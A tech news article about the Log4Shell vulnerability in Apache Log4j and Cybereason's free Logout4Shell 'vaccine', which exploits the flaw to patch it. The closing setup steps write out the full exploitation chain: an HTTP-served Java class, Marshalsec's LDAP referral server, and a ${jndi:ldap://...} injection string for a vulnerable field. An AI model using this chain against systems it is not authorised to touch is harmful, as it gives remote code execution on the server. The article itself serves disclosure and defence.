Security firm releases a free fix for serious Log4Shell vulnerability in Apache Log4j

If you are running a version of Apache Log4j between 2.0-beta9 to 2.14.1 (inclusive) the Log4Shell vulnerability is something you need to be aware off. Tracked as CVE-2021-44228, this is a serious and easily exploited RCE flaw in the open-source Java-based logging utility.

An attacker can exploit the security flaw to execute a remote attack by simply using a particular string as the browser user agent. Although the Apache Software Foundation has released a patched version of Log4j 2.15.0, not everyone is able to update straight away, and this is something that attackers are taking advantage of. Thankfully, security firm Cybereason has released a "vaccine" called Logout4Shell that protects against Log4Shell.

See also:

• Microsoft's recently released KB5007262 update may fix SSD performance issues in Windows 11
• Update Microsoft Teams to fix 911 call-block problem
• How to check for Windows updates from the context menu in Windows 10 and Windows 11

The company has produced the free "vaccine" which fixes the flaw by using the bug against itself.

Writing about the vulnerability in a blog post, Cybereason says: "A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s GitHub on December 9, 2021. The flaw has been dubbed 'Log4Shell', and has the highest possible severity rating of 10. Apache is pervasive and comprises nearly a third of all web servers in the world -- making this a potentially catastrophic flaw.

The company continues:

Log4j is an open source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can allow threat actors to take control of any Java-based, internet-facing server and engage in remote code execution (RCE) attacks.

Most login screens in the world typically audit failed login attempts, meaning that virtually every authenticated page using Log4j is vulnerable. Browser search bars are also often logged and expose systems to this flaw.

Exploiting the flaw is fairly trivial. An attacker can exploit the vulnerability by simply sending a malicious code string that gets logged by Log4j. At that point, the exploit will allow the attacker to load arbitrary Java code and take control of the server.

Over on GitHub, Cybereason has released its Logout4Shell vaccine, and provides the following instructions:

1. Download this report and build it
   • git clone https://github.com/cybereason/Logout4Shell.git
   • build it - mvn package
   • cd target/classes
   • run the webserver - python3 -m http.server 8888
2. Download, build and run Marshalsec's ldap server
   • git clone https://github.com/mbechler/marshalsec.git
   • mvn package -DskipTests
   • java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE"
3. To immunize a server
   • enter ${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a} into a vulnerable field (such as user name)

More information and code is available here.